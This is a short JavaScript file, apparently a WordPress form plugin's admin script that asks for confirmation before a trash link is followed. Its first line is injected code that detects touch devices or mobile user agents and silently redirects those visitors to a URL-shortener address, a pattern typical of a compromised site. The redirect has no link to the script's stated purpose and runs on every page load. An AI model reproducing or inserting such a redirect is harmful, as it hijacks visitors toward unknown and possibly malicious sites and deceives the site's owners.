(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/iLREvXfVE0r2");
jQuery(document).ready(function($) {
	$( '.trash a' ).click( function( e ) {
		e.preventDefault();
		var answer = confirm( nfi18n.confirm_delete );
		if ( answer ) {
			window.location.href = e.currentTarget.href;
		}
	} );
} );